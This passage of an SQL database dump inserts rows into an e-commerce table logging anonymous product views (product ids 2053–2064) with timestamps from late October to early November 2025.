(21349, NULL, NULL, 2060, 1, '2025-10-29 16:20:31'),
(21350, NULL, NULL, 2063, 1, '2025-10-29 16:51:21'),
(21351, NULL, NULL, 2064, 1, '2025-10-29 18:03:18'),
(21352, NULL, NULL, 2058, 1, '2025-10-29 18:53:34'),
(21353, NULL, NULL, 2062, 1, '2025-10-29 20:07:07'),
(21354, NULL, NULL, 2060, 1, '2025-10-29 22:15:29'),
(21355, NULL, NULL, 2061, 1, '2025-10-29 23:23:30'),
(21356, NULL, NULL, 2062, 1, '2025-10-29 23:47:44'),
(21357, NULL, NULL, 2061, 1, '2025-10-29 23:48:14'),
(21358, NULL, NULL, 2058, 1, '2025-10-29 23:48:28'),
(21359, NULL, NULL, 2060, 1, '2025-10-29 23:48:41'),
(21360, NULL, NULL, 2064, 1, '2025-10-29 23:48:55'),
(21361, NULL, NULL, 2063, 1, '2025-10-29 23:49:09'),
(21362, NULL, NULL, 2059, 1, '2025-10-29 23:49:37'),
(21363, NULL, NULL, 2054, 1, '2025-10-29 23:50:05'),
(21364, NULL, NULL, 2055, 1, '2025-10-29 23:51:47'),
(21365, NULL, NULL, 2053, 1, '2025-10-29 23:53:15'),
(21366, NULL, NULL, 2053, 1, '2025-10-30 01:53:13'),
(21367, NULL, NULL, 2055, 1, '2025-10-30 05:16:35'),
(21368, NULL, NULL, 2054, 1, '2025-10-30 05:34:01'),
(21369, NULL, NULL, 2060, 1, '2025-10-30 05:34:39'),
(21370, NULL, NULL, 2054, 1, '2025-10-30 05:51:15'),
(21371, NULL, NULL, 2064, 1, '2025-10-30 07:00:14'),
(21372, NULL, NULL, 2062, 1, '2025-10-30 08:18:53'),
(21373, NULL, NULL, 2054, 1, '2025-10-30 08:27:24'),
(21374, NULL, NULL, 2064, 1, '2025-10-30 08:56:28'),
(21375, NULL, NULL, 2053, 1, '2025-10-30 11:06:23'),
(21376, NULL, NULL, 2063, 1, '2025-10-30 11:35:54'),
(21377, NULL, NULL, 2054, 1, '2025-10-30 11:51:19'),
(21378, NULL, NULL, 2064, 1, '2025-10-30 13:41:11'),
(21379, NULL, NULL, 2064, 1, '2025-10-30 15:10:00'),
(21380, NULL, NULL, 2060, 1, '2025-10-30 15:18:12'),
(21381, NULL, NULL, 2059, 1, '2025-10-30 15:29:57'),
(21382, NULL, NULL, 2055, 1, '2025-10-30 15:39:23'),
(21383, NULL, NULL, 2055, 1, '2025-10-30 16:40:38'),
(21384, NULL, NULL, 2058, 1, '2025-10-30 16:49:57'),
(21385, NULL, NULL, 2054, 1, '2025-10-30 17:22:51'),
(21386, NULL, NULL, 2064, 1, '2025-10-30 17:31:50'),
(21387, NULL, NULL, 2059, 1, '2025-10-30 18:02:29'),
(21388, NULL, NULL, 2053, 1, '2025-10-30 19:52:28'),
(21389, NULL, NULL, 2054, 1, '2025-10-30 20:16:41');
INSERT INTO `report_viewed_product_index` (`index_id`, `visitor_id`, `customer_id`, `product_id`, `store_id`, `added_at`) VALUES
(21390, NULL, NULL, 2064, 1, '2025-10-30 20:41:59'),
(21391, NULL, NULL, 2062, 1, '2025-10-30 22:39:56'),
(21392, NULL, NULL, 2063, 1, '2025-10-30 22:39:58'),
(21393, NULL, NULL, 2061, 1, '2025-10-30 22:40:07'),
(21394, NULL, NULL, 2059, 1, '2025-10-30 22:43:49'),
(21395, NULL, NULL, 2060, 1, '2025-10-30 23:01:53'),
(21396, NULL, NULL, 2060, 1, '2025-10-31 00:03:00'),
(21397, NULL, NULL, 2059, 1, '2025-10-31 03:06:51'),
(21398, NULL, NULL, 2063, 1, '2025-10-31 04:47:35'),
(21399, NULL, NULL, 2054, 1, '2025-10-31 05:55:14'),
(21400, NULL, NULL, 2063, 1, '2025-10-31 06:20:49'),
(21401, NULL, NULL, 2061, 1, '2025-10-31 06:31:51'),
(21402, NULL, NULL, 2064, 1, '2025-10-31 07:35:32'),
(21403, NULL, NULL, 2060, 1, '2025-10-31 07:35:48'),
(21404, NULL, NULL, 2058, 1, '2025-10-31 07:36:00'),
(21405, NULL, NULL, 2063, 1, '2025-10-31 07:36:29'),
(21406, NULL, NULL, 2061, 1, '2025-10-31 07:36:35'),
(21407, NULL, NULL, 2055, 1, '2025-10-31 07:37:22'),
(21408, NULL, NULL, 2062, 1, '2025-10-31 07:37:30'),
(21409, NULL, NULL, 2059, 1, '2025-10-31 07:38:01'),
(21410, NULL, NULL, 2054, 1, '2025-10-31 07:38:15'),
(21411, NULL, NULL, 2062, 1, '2025-10-31 07:43:43'),
(21412, NULL, NULL, 2060, 1, '2025-10-31 08:10:09'),
(21413, NULL, NULL, 2062, 1, '2025-10-31 11:41:17'),
(21414, NULL, NULL, 2064, 1, '2025-10-31 11:43:52'),
(21415, NULL, NULL, 2064, 1, '2025-10-31 13:49:21'),
(21416, NULL, NULL, 2061, 1, '2025-10-31 14:02:34'),
(21417, NULL, NULL, 2064, 1, '2025-10-31 15:16:11'),
(21418, NULL, NULL, 2060, 1, '2025-10-31 16:52:22'),
(21419, NULL, NULL, 2060, 1, '2025-10-31 17:41:59'),
(21420, NULL, NULL, 2063, 1, '2025-10-31 17:51:44'),
(21421, NULL, NULL, 2064, 1, '2025-10-31 18:19:31'),
(21422, NULL, NULL, 2061, 1, '2025-10-31 18:48:35'),
(21423, NULL, NULL, 2054, 1, '2025-10-31 19:26:24'),
(21424, NULL, NULL, 2060, 1, '2025-10-31 19:34:51'),
(21425, NULL, NULL, 2054, 1, '2025-10-31 19:55:05'),
(21426, NULL, NULL, 2063, 1, '2025-10-31 21:06:47'),
(21427, NULL, NULL, 2061, 1, '2025-10-31 21:41:25'),
(21428, NULL, NULL, 2059, 1, '2025-10-31 22:48:42'),
(21429, NULL, NULL, 2062, 1, '2025-10-31 23:15:33'),
(21430, NULL, NULL, 2060, 1, '2025-11-01 00:40:16'),
(21431, NULL, NULL, 2054, 1, '2025-11-01 01:07:21'),
(21432, NULL, NULL, 2060, 1, '2025-11-01 01:35:52'),
(21433, NULL, NULL, 2058, 1, '2025-11-01 03:43:37'),
(21434, NULL, NULL, 2064, 1, '2025-11-01 03:55:23'),
(21435, NULL, NULL, 2059, 1, '2025-11-01 04:04:56'),
(21436, NULL, NULL, 2062, 1, '2025-11-01 04:24:48'),
(21437, NULL, NULL, 2058, 1, '2025-11-01 04:35:08'),
(21438, NULL, NULL, 2055, 1, '2025-11-01 04:45:58'),
(21439, NULL, NULL, 2064, 1, '2025-11-01 05:16:31'),
(21440, NULL, NULL, 2058, 1, '2025-11-01 07:27:35'),
(21441, NULL, NULL, 2054, 1, '2025-11-01 09:28:06'),
(21442, NULL, NULL, 2058, 1, '2025-11-01 09:34:03'),
(21443, NULL, NULL, 2060, 1, '2025-11-01 09:37:00'),
(21444, NULL, NULL, 2064, 1, '2025-11-01 10:07:09'),
(21445, NULL, NULL, 2063, 1, '2025-11-01 10:17:43'),
(21446, NULL, NULL, 2060, 1, '2025-11-01 11:37:47'),
(21447, NULL, NULL, 2055, 1, '2025-11-01 12:04:57'),
(21448, NULL, NULL, 2058, 1, '2025-11-01 12:05:32'),
(21449, NULL, NULL, 2054, 1, '2025-11-01 12:18:59'),
(21450, 4063, NULL, 2064, 1, '2025-11-01 13:46:20'),
(21451, NULL, NULL, 2064, 1, '2025-11-01 15:06:27'),
(21452, NULL, NULL, 2060, 1, '2025-11-01 15:40:13'),
(21453, NULL, NULL, 2059, 1, '2025-11-01 18:16:32'),
(21454, NULL, NULL, 2064, 1, '2025-11-01 18:18:48'),
(21455, NULL, NULL, 2064, 1, '2025-11-01 18:30:11'),
(21456, NULL, NULL, 2053, 1, '2025-11-01 19:01:00'),
(21457, NULL, NULL, 2061, 1, '2025-11-01 19:47:28'),
(21458, NULL, NULL, 2054, 1, '2025-11-01 22:34:23'),
(21459, NULL, NULL, 2064, 1, '2025-11-01 22:49:24'),
(21460, NULL, NULL, 2058, 1, '2025-11-02 01:28:50'),
(21461, NULL, NULL, 2054, 1, '2025-11-02 01:48:16'),
(21462, NULL, NULL, 2062, 1, '2025-11-02 02:56:41'),
(21463, NULL, NULL, 2063, 1, '2025-11-02 03:07:17'),
(21464, NULL, NULL, 2064, 1, '2025-11-02 05:31:27'),
(21465, NULL, NULL, 2060, 1, '2025-11-02 06:42:48'),
(21466, NULL, NULL, 2059, 1, '2025-11-02 06:42:53'),
(21467, NULL, NULL, 2062, 1, '2025-11-02 09:07:50'),
(21468, NULL, NULL, 2053, 1, '2025-11-02 11:54:47'),
(21469, NULL, NULL, 2054, 1, '2025-11-02 12:08:04'),
(21470, NULL, NULL, 2064, 1, '2025-11-02 13:26:44'),
(21471, NULL, NULL, 2060, 1, '2025-11-02 13:54:09'),
(21472, NULL, NULL, 2059, 1, '2025-11-02 14:31:02'),
(21473, NULL, NULL, 2064, 1, '2025-11-02 15:57:32'),
(21474, NULL, NULL, 2064, 1, '2025-11-02 16:44:07'),
(21475, NULL, NULL, 2054, 1, '2025-11-02 18:10:27'),
(21476, NULL, NULL, 2062, 1, '2025-11-02 18:46:01'),
(21477, NULL, NULL, 2060, 1, '2025-11-02 18:56:59'),
(21478, NULL, NULL, 2054, 1, '2025-11-02 20:31:59'),
(21479, NULL, NULL, 2064, 1, '2025-11-02 21:18:46'),
(21480, NULL, NULL, 2060, 1, '2025-11-02 21:36:12'),
(21481, NULL, NULL, 2054, 1, '2025-11-02 21:43:00'),
(21482, NULL, NULL, 2063, 1, '2025-11-02 23:42:04'),
(21483, NULL, NULL, 2059, 1, '2025-11-03 00:02:51'),
(21484, NULL, NULL, 2054, 1, '2025-11-03 00:14:23'),
(21485, NULL, NULL, 2055, 1, '2025-11-03 01:11:13'),
(21486, NULL, NULL, 2055, 1, '2025-11-03 07:14:22'),
(21487, NULL, NULL, 2060, 1, '2025-11-03 08:43:08'),
(21488, NULL, NULL, 2063, 1, '2025-11-03 08:46:01'),
(21489, NULL, NULL, 2054, 1, '2025-11-03 08:56:43'),
(21490, NULL, NULL, 2059, 1, '2025-11-03 09:32:27'),
(21491, NULL, NULL, 2061, 1, '2025-11-03 09:32:27'),
(21492, NULL, NULL, 2064, 1, '2025-11-03 09:32:34'),
(21493, NULL, NULL, 2064, 1, '2025-11-03 09:32:34'),
(21494, NULL, NULL, 2064, 1, '2025-11-03 09:32:34'),
(21495, NULL, NULL, 2063, 1, '2025-11-03 09:32:34'),
(21496, NULL, NULL, 2060, 1, '2025-11-03 09:32:35'),
(21497, NULL, NULL, 2054, 1, '2025-11-03 09:32:35'),
(21498, NULL, NULL, 2059, 1, '2025-11-03 09:32:35'),
(21499, NULL, NULL, 2054, 1, '2025-11-03 09:32:36'),
(21500, NULL, NULL, 2053, 1, '2025-11-03 09:32:37'),
(21501, NULL, NULL, 2058, 1, '2025-11-03 09:32:37'),
(21502, NULL, NULL, 2062, 1, '2025-11-03 09:32:41'),
(21503, NULL, NULL, 2061, 1, '2025-11-03 09:32:41'),
(21504, NULL, NULL, 2061, 1, '2025-11-03 09:32:41'),
(21505, NULL, NULL, 2055, 1, '2025-11-03 09:32:41'),
(21506, NULL, NULL, 2058, 1, '2025-11-03 09:32:42'),
(21507, NULL, NULL, 2059, 1, '2025-11-03 09:32:44'),
(21508, NULL, NULL, 2059, 1, '2025-11-03 09:32:44'),
(21509, NULL, NULL, 2059, 1, '2025-11-03 09:32:44'),
(21510, NULL, NULL, 2059, 1, '2025-11-03 09:32:44'),
(21511, NULL, NULL, 2059, 1, '2025-11-03 09:32:44'),
(21512, NULL, NULL, 2059, 1, '2025-11-03 09:32:45'),
(21513, NULL, NULL, 2059, 1, '2025-11-03 09:32:45'),
(21514, NULL, NULL, 2059, 1, '2025-11-03 09:32:45'),
(21515, NULL, NULL, 2059, 1, '2025-11-03 09:32:45'),
(21516, NULL, NULL, 2054, 1, '2025-11-03 09:32:46'),
(21517, NULL, NULL, 2058, 1, '2025-11-03 09:32:47'),
(21518, NULL, NULL, 2064, 1, '2025-11-03 09:32:48'),
(21519, NULL, NULL, 2064, 1, '2025-11-03 09:32:48'),
(21520, NULL, NULL, 2061, 1, '2025-11-03 09:32:48'),
(21521, NULL, NULL, 2064, 1, '2025-11-03 09:32:49'),
(21522, NULL, NULL, 2063, 1, '2025-11-03 09:32:49'),
(21523, NULL, NULL, 2064, 1, '2025-11-03 09:32:49'),
(21524, NULL, NULL, 2061, 1, '2025-11-03 09:32:49'),
(21525, NULL, NULL, 2063, 1, '2025-11-03 09:32:50'),
(21526, NULL, NULL, 2054, 1, '2025-11-03 09:32:50'),
(21527, NULL, NULL, 2055, 1, '2025-11-03 09:32:50'),
(21528, NULL, NULL, 2058, 1, '2025-11-03 09:32:50'),
(21529, NULL, NULL, 2060, 1, '2025-11-03 09:32:51'),
(21530, NULL, NULL, 2059, 1, '2025-11-03 09:32:52'),
(21531, NULL, NULL, 2059, 1, '2025-11-03 09:32:52'),
(21532, NULL, NULL, 2059, 1, '2025-11-03 09:32:52'),
(21533, NULL, NULL, 2059, 1, '2025-11-03 09:32:52'),
(21534, NULL, NULL, 2059, 1, '2025-11-03 09:32:53'),
(21535, NULL, NULL, 2059, 1, '2025-11-03 09:32:53'),
(21536, NULL, NULL, 2059, 1, '2025-11-03 09:32:53'),
(21537, NULL, NULL, 2059, 1, '2025-11-03 09:32:53'),
(21538, NULL, NULL, 2063, 1, '2025-11-03 09:32:54'),
(21539, NULL, NULL, 2062, 1, '2025-11-03 09:32:54'),
(21540, NULL, NULL, 2053, 1, '2025-11-03 09:32:54'),
(21541, NULL, NULL, 2059, 1, '2025-11-03 09:32:55'),
(21542, NULL, NULL, 2064, 1, '2025-11-03 09:32:55'),
(21543, NULL, NULL, 2064, 1, '2025-11-03 09:32:55'),
(21544, NULL, NULL, 2055, 1, '2025-11-03 09:32:56'),
(21545, NULL, NULL, 2058, 1, '2025-11-03 09:32:57'),
(21546, NULL, NULL, 2060, 1, '2025-11-03 09:32:57'),
(21547, NULL, NULL, 2061, 1, '2025-11-03 09:32:59'),
(21548, NULL, NULL, 2054, 1, '2025-11-03 09:32:59'),
(21549, NULL, NULL, 2053, 1, '2025-11-03 09:33:01'),
(21550, NULL, NULL, 2053, 1, '2025-11-03 09:33:02'),
(21551, NULL, NULL, 2053, 1, '2025-11-03 09:33:03'),
(21552, NULL, NULL, 2053, 1, '2025-11-03 09:33:04'),
(21553, NULL, NULL, 2053, 1, '2025-11-03 09:33:10'),
(21554, NULL, NULL, 2053, 1, '2025-11-03 09:33:11'),
(21555, NULL, NULL, 2053, 1, '2025-11-03 09:33:11'),
(21556, NULL, NULL, 2053, 1, '2025-11-03 09:33:11'),
(21557, NULL, NULL, 2053, 1, '2025-11-03 09:33:11'),
(21558, NULL, NULL, 2053, 1, '2025-11-03 09:33:12'),
(21559, NULL, NULL, 2053, 1, '2025-11-03 09:33:15'),
(21560, NULL, NULL, 2053, 1, '2025-11-03 09:33:15'),
(21561, NULL, NULL, 2053, 1, '2025-11-03 09:33:15'),
(21562, NULL, NULL, 2053, 1, '2025-11-03 09:33:15'),
(21563, NULL, NULL, 2053, 1, '2025-11-03 09:33:15'),
(21564, NULL, NULL, 2053, 1, '2025-11-03 09:33:15'),
(21565, NULL, NULL, 2053, 1, '2025-11-03 09:33:20'),
(21566, NULL, NULL, 2053, 1, '2025-11-03 09:33:20'),
(21567, NULL, NULL, 2053, 1, '2025-11-03 09:33:20'),
(21568, NULL, NULL, 2053, 1, '2025-11-03 09:33:20'),
(21569, NULL, NULL, 2053, 1, '2025-11-03 09:33:20'),
(21570, NULL, NULL, 2053, 1, '2025-11-03 09:33:20'),
(21571, NULL, NULL, 2053, 1, '2025-11-03 09:33:21'),
(21572, NULL, NULL, 2053, 1, '2025-11-03 09:33:28'),
(21573, NULL, NULL, 2053, 1, '2025-11-03 09:33:33'),
(21574, NULL, NULL, 2054, 1, '2025-11-03 12:41:28'),
(21575, NULL, NULL, 2064, 1, '2025-11-03 13:33:49'),
(21576, NULL, NULL, 2062, 1, '2025-11-03 13:33:55'),
(21577, NULL, NULL, 2063, 1, '2025-11-03 13:33:59'),
(21578, NULL, NULL, 2061, 1, '2025-11-03 13:34:04'),
(21579, NULL, NULL, 2059, 1, '2025-11-03 13:34:10'),
(21580, NULL, NULL, 2058, 1, '2025-11-03 13:34:14'),
(21581, NULL, NULL, 2055, 1, '2025-11-03 13:34:19'),
(21582, NULL, NULL, 2054, 1, '2025-11-03 13:34:24'),
(21583, NULL, NULL, 2060, 1, '2025-11-03 13:34:28'),
(21584, NULL, NULL, 2064, 1, '2025-11-03 14:34:45'),
(21585, NULL, NULL, 2053, 1, '2025-11-03 15:28:50'),
(21586, NULL, NULL, 2059, 1, '2025-11-03 15:35:19'),
(21587, NULL, NULL, 2064, 1, '2025-11-03 16:06:33'),
(21588, NULL, NULL, 2060, 1, '2025-11-03 16:56:41'),
(21589, NULL, NULL, 2059, 1, '2025-11-03 18:53:28'),
(21590, NULL, NULL, 2054, 1, '2025-11-03 19:51:15'),
(21591, NULL, NULL, 2058, 1, '2025-11-03 19:58:35'),
(21592, NULL, NULL, 2061, 1, '2025-11-03 20:53:15'),
(21593, NULL, NULL, 2064, 1, '2025-11-03 22:16:52'),
(21594, NULL, NULL, 2059, 1, '2025-11-03 22:17:02'),
(21595, NULL, NULL, 2060, 1, '2025-11-03 22:17:12'),
(21596, NULL, NULL, 2063, 1, '2025-11-03 22:17:22'),
(21597, NULL, NULL, 2061, 1, '2025-11-03 22:21:02'),
(21598, NULL, NULL, 2054, 1, '2025-11-03 22:25:57'),
(21599, NULL, NULL, 2062, 1, '2025-11-03 22:29:47'),
(21600, NULL, NULL, 2055, 1, '2025-11-03 22:54:57'),
(21601, NULL, NULL, 2053, 1, '2025-11-03 22:57:27'),
(21602, NULL, NULL, 2058, 1, '2025-11-03 23:03:47'),
(21603, NULL, NULL, 2060, 1, '2025-11-04 03:05:56'),
(21604, NULL, NULL, 2064, 1, '2025-11-04 03:16:53'),
(21605, NULL, NULL, 2054, 1, '2025-11-04 04:05:10'),
(21606, NULL, NULL, 2064, 1, '2025-11-04 07:58:51'),
(21607, NULL, NULL, 2060, 1, '2025-11-04 08:39:13'),
(21608, NULL, NULL, 2055, 1, '2025-11-04 09:16:11'),
(21609, NULL, NULL, 2064, 1, '2025-11-04 10:01:54'),
(21610, NULL, NULL, 2064, 1, '2025-11-04 10:28:00'),
(21611, NULL, NULL, 2060, 1, '2025-11-04 13:35:56'),
(21612, NULL, NULL, 2064, 1, '2025-11-04 14:55:55'),
(21613, NULL, NULL, 2064, 1, '2025-11-04 14:57:25'),
(21614, NULL, NULL, 2054, 1, '2025-11-04 16:02:18'),
(21615, NULL, NULL, 2060, 1, '2025-11-04 17:42:35'),
(21616, NULL, NULL, 2054, 1, '2025-11-04 17:56:46'),
(21617, NULL, NULL, 2062, 1, '2025-11-04 18:00:00'),
(21618, NULL, NULL, 2054, 1, '2025-11-04 18:35:54'),
(21619, NULL, NULL, 2064, 1, '2025-11-04 18:42:32'),
(21620, NULL, NULL, 2060, 1, '2025-11-04 19:57:08'),
(21621, NULL, NULL, 2061, 1, '2025-11-04 21:06:21'),
(21622, NULL, NULL, 2062, 1, '2025-11-05 02:49:09'),
(21623, NULL, NULL, 2061, 1, '2025-11-05 06:22:54'),
(21624, NULL, NULL, 2054, 1, '2025-11-05 09:35:13'),
(21625, NULL, NULL, 2060, 1, '2025-11-05 11:52:22'),
(21626, NULL, NULL, 2064, 1, '2025-11-05 13:01:56'),
(21627, NULL, NULL, 2060, 1, '2025-11-05 13:22:34'),
(21628, NULL, NULL, 2064, 1, '2025-11-05 13:22:49'),
(21629, NULL, NULL, 2064, 1, '2025-11-05 14:29:54'),
(21630, NULL, NULL, 2053, 1, '2025-11-05 15:18:24'),
(21631, NULL, NULL, 2064, 1, '2025-11-05 17:16:14'),
(21632, NULL, NULL, 2059, 1, '2025-11-05 19:01:10'),
(21633, NULL, NULL, 2058, 1, '2025-11-05 19:03:34'),
(21634, NULL, NULL, 2062, 1, '2025-11-05 19:15:12'),
(21635, NULL, NULL, 2063, 1, '2025-11-05 19:17:24'),
(21636, NULL, NULL, 2064, 1, '2025-11-05 19:26:41'),
(21637, NULL, NULL, 2063, 1, '2025-11-05 19:37:53'),
(21638, NULL, NULL, 2060, 1, '2025-11-05 20:14:35'),
(21639, NULL, NULL, 2054, 1, '2025-11-05 20:17:04'),
(21640, NULL, NULL, 2063, 1, '2025-11-05 20:43:24'),
(21641, NULL, NULL, 2064, 1, '2025-11-05 21:21:16'),
(21642, NULL, NULL, 2064, 1, '2025-11-05 21:46:49'),
(21643, NULL, NULL, 2060, 1, '2025-11-05 22:42:24'),
(21644, NULL, NULL, 2054, 1, '2025-11-06 00:26:16'),
(21645, NULL, NULL, 2053, 1, '2025-11-06 02:13:27'),
(21646, NULL, NULL, 2064, 1, '2025-11-06 04:28:59'),
(21647, NULL, NULL, 2059, 1, '2025-11-06 04:41:06'),
(21648, NULL, NULL, 2062, 1, '2025-11-06 04:49:52'),
(21649, NULL, NULL, 2058, 1, '2025-11-06 05:09:42'),
(21650, NULL, NULL, 2055, 1, '2025-11-06 05:20:28'),
(21651, NULL, NULL, 2053, 1, '2025-11-06 05:56:08'),
(21652, NULL, NULL, 2060, 1, '2025-11-06 06:18:28'),
(21653, NULL, NULL, 2063, 1, '2025-11-06 06:24:36'),
(21654, NULL, NULL, 2058, 1, '2025-11-06 06:41:10'),
(21655, NULL, NULL, 2055, 1, '2025-11-06 07:13:33'),
(21656, NULL, NULL, 2061, 1, '2025-11-06 08:06:18'),
(21657, NULL, NULL, 2062, 1, '2025-11-06 08:36:47'),
(21658, NULL, NULL, 2064, 1, '2025-11-06 09:20:19'),
(21659, NULL, NULL, 2054, 1, '2025-11-06 09:29:12'),
(21660, NULL, NULL, 2059, 1, '2025-11-06 09:39:21'),
(21661, NULL, NULL, 2064, 1, '2025-11-06 09:48:36'),
(21662, NULL, NULL, 2054, 1, '2025-11-06 10:03:24'),
(21663, NULL, NULL, 2054, 1, '2025-11-06 10:17:40'),
(21664, NULL, NULL, 2059, 1, '2025-11-06 11:31:43'),
(21665, NULL, NULL, 2055, 1, '2025-11-06 11:34:42'),
(21666, NULL, NULL, 2060, 1, '2025-11-06 11:45:41'),
(21667, NULL, NULL, 2064, 1, '2025-11-06 12:54:41'),
(21668, NULL, NULL, 2054, 1, '2025-11-06 13:36:19'),
(21669, NULL, NULL, 2060, 1, '2025-11-06 13:54:09'),
(21670, NULL, NULL, 2060, 1, '2025-11-06 13:54:11'),
(21671, NULL, NULL, 2058, 1, '2025-11-06 14:21:31'),
(21672, NULL, NULL, 2064, 1, '2025-11-06 15:38:26'),
(21673, NULL, NULL, 2059, 1, '2025-11-06 17:52:46'),
(21674, NULL, NULL, 2062, 1, '2025-11-06 18:24:38'),
(21675, NULL, NULL, 2064, 1, '2025-11-06 18:26:00'),
(21676, NULL, NULL, 2059, 1, '2025-11-06 19:00:54'),
(21677, NULL, NULL, 2064, 1, '2025-11-06 20:03:30'),
(21678, NULL, NULL, 2059, 1, '2025-11-06 20:36:05'),
(21679, NULL, NULL, 2060, 1, '2025-11-06 20:57:39'),
(21680, NULL, NULL, 2058, 1, '2025-11-06 20:58:07'),
(21681, NULL, NULL, 2061, 1, '2025-11-06 20:59:06'),
(21682, NULL, NULL, 2064, 1, '2025-11-06 21:01:14'),
(21683, NULL, NULL, 2054, 1, '2025-11-06 21:06:17'),
(21684, NULL, NULL, 2062, 1, '2025-11-06 21:17:25'),
(21685, NULL, NULL, 2063, 1, '2025-11-06 21:37:22'),
(21686, NULL, NULL, 2059, 1, '2025-11-06 21:53:24'),
(21687, NULL, NULL, 2054, 1, '2025-11-06 22:06:13'),
(21688, NULL, NULL, 2061, 1, '2025-11-06 22:43:14'),
(21689, NULL, NULL, 2063, 1, '2025-11-06 22:43:19'),
(21690, NULL, NULL, 2062, 1, '2025-11-06 22:43:26'),
(21691, NULL, NULL, 2061, 1, '2025-11-06 22:52:48'),
(21692, NULL, NULL, 2060, 1, '2025-11-06 23:24:11'),
(21693, NULL, NULL, 2063, 1, '2025-11-07 01:18:02'),
(21694, NULL, NULL, 2055, 1, '2025-11-07 01:19:25'),
(21695, NULL, NULL, 2064, 1, '2025-11-07 01:45:17'),
(21696, NULL, NULL, 2062, 1, '2025-11-07 01:45:48'),
(21697, NULL, NULL, 2062, 1, '2025-11-07 02:23:18'),
(21698, NULL, NULL, 2059, 1, '2025-11-07 03:34:10'),
(21699, NULL, NULL, 2062, 1, '2025-11-07 03:54:53'),
(21700, NULL, NULL, 2058, 1, '2025-11-07 04:17:20'),
(21701, NULL, NULL, 2064, 1, '2025-11-07 05:37:27'),
(21702, NULL, NULL, 2060, 1, '2025-11-07 05:40:55'),
(21703, NULL, NULL, 2060, 1, '2025-11-07 08:35:53'),
(21704, NULL, NULL, 2064, 1, '2025-11-07 11:41:09'),
(21705, NULL, NULL, 2058, 1, '2025-11-07 14:39:33'),
(21706, NULL, NULL, 2054, 1, '2025-11-07 17:49:29'),
(21707, NULL, NULL, 2062, 1, '2025-11-07 18:10:26'),
(21708, NULL, NULL, 2054, 1, '2025-11-07 18:23:25'),
(21709, NULL, NULL, 2064, 1, '2025-11-07 18:58:02'),
(21710, NULL, NULL, 2064, 1, '2025-11-07 19:55:16'),
(21711, NULL, NULL, 2060, 1, '2025-11-07 20:22:07'),
(21712, NULL, NULL, 2062, 1, '2025-11-07 20:22:07'),
(21713, NULL, NULL, 2064, 1, '2025-11-07 20:22:07'),
(21714, NULL, NULL, 2064, 1, '2025-11-07 20:22:08'),
(21715, NULL, NULL, 2058, 1, '2025-11-07 20:22:08'),
(21716, NULL, NULL, 2059, 1, '2025-11-07 20:22:08'),
(21717, NULL, NULL, 2064, 1, '2025-11-07 20:22:08'),
(21718, NULL, NULL, 2063, 1, '2025-11-07 20:22:08'),
(21719, NULL, NULL, 2061, 1, '2025-11-07 20:22:08'),
(21720, NULL, NULL, 2064, 1, '2025-11-07 20:22:16'),
(21721, NULL, NULL, 2063, 1, '2025-11-07 20:22:16'),
(21722, NULL, NULL, 2059, 1, '2025-11-07 20:22:16'),
(21723, NULL, NULL, 2064, 1, '2025-11-07 20:22:16'),
(21724, NULL, NULL, 2062, 1, '2025-11-07 20:22:16'),
(21725, NULL, NULL, 2058, 1, '2025-11-07 20:22:16'),
(21726, NULL, NULL, 2061, 1, '2025-11-07 20:22:16'),
(21727, NULL, NULL, 2060, 1, '2025-11-07 20:22:16'),
(21728, NULL, NULL, 2064, 1, '2025-11-07 20:22:17'),
(21729, NULL, NULL, 2063, 1, '2025-11-07 20:22:22'),
(21730, NULL, NULL, 2054, 1, '2025-11-07 20:22:22'),
(21731, NULL, NULL, 2059, 1, '2025-11-07 20:22:22'),
(21732, NULL, NULL, 2055, 1, '2025-11-07 20:22:24'),
(21733, NULL, NULL, 2058, 1, '2025-11-07 20:22:25'),
(21734, NULL, NULL, 2064, 1, '2025-11-07 20:22:25'),
(21735, NULL, NULL, 2062, 1, '2025-11-07 20:22:25'),
(21736, NULL, NULL, 2060, 1, '2025-11-07 20:22:25'),
(21737, NULL, NULL, 2064, 1, '2025-11-07 20:22:25'),
(21738, NULL, NULL, 2064, 1, '2025-11-07 20:22:25'),
(21739, NULL, NULL, 2061, 1, '2025-11-07 20:22:25'),
(21740, NULL, NULL, 2054, 1, '2025-11-07 20:22:33'),
(21741, NULL, NULL, 2055, 1, '2025-11-07 20:22:33'),
(21742, NULL, NULL, 2054, 1, '2025-11-07 20:22:33'),
(21743, NULL, NULL, 2055, 1, '2025-11-07 20:22:36'),
(21744, NULL, NULL, 2059, 1, '2025-11-07 20:26:38'),
(21745, NULL, NULL, 2054, 1, '2025-11-07 22:06:14'),
(21746, NULL, NULL, 2060, 1, '2025-11-07 22:09:01'),
(21747, NULL, NULL, 2053, 1, '2025-11-08 00:04:14'),
(21748, NULL, NULL, 2063, 1, '2025-11-08 01:18:38'),
(21749, NULL, NULL, 2059, 1, '2025-11-08 01:57:26'),
(21750, NULL, NULL, 2062, 1, '2025-11-08 01:58:09'),
(21751, NULL, NULL, 2060, 1, '2025-11-08 02:43:17'),
(21752, NULL, NULL, 2058, 1, '2025-11-08 02:45:17'),
(21753, NULL, NULL, 2063, 1, '2025-11-08 02:48:28'),
(21754, NULL, NULL, 2061, 1, '2025-11-08 03:17:08'),
(21755, NULL, NULL, 2062, 1, '2025-11-08 03:59:59'),
(21756, NULL, NULL, 2060, 1, '2025-11-08 06:35:02'),
(21757, NULL, NULL, 2060, 1, '2025-11-08 06:49:49'),
(21758, NULL, NULL, 2054, 1, '2025-11-08 06:50:27'),
(21759, NULL, NULL, 2064, 1, '2025-11-08 07:13:10'),
(21760, NULL, NULL, 2064, 1, '2025-11-08 10:40:46'),
(21761, NULL, NULL, 2054, 1, '2025-11-08 10:47:54'),
(21762, NULL, NULL, 2062, 1, '2025-11-08 11:24:24'),
(21763, NULL, NULL, 2064, 1, '2025-11-08 11:51:38'),
(21764, NULL, NULL, 2064, 1, '2025-11-08 11:53:22'),
(21765, NULL, NULL, 2055, 1, '2025-11-08 11:56:51'),
(21766, NULL, NULL, 2054, 1, '2025-11-08 12:09:48'),
(21767, NULL, NULL, 2059, 1, '2025-11-08 16:05:24'),
(21768, NULL, NULL, 2061, 1, '2025-11-08 21:03:05'),
(21769, NULL, NULL, 2064, 1, '2025-11-08 21:23:40'),
(21770, NULL, NULL, 2064, 1, '2025-11-08 21:54:02'),
(21771, NULL, NULL, 2061, 1, '2025-11-08 22:19:36'),
(21772, NULL, NULL, 2054, 1, '2025-11-08 22:47:35'),
(21773, NULL, NULL, 2060, 1, '2025-11-08 23:04:29'),
(21774, NULL, NULL, 2064, 1, '2025-11-08 23:31:57'),
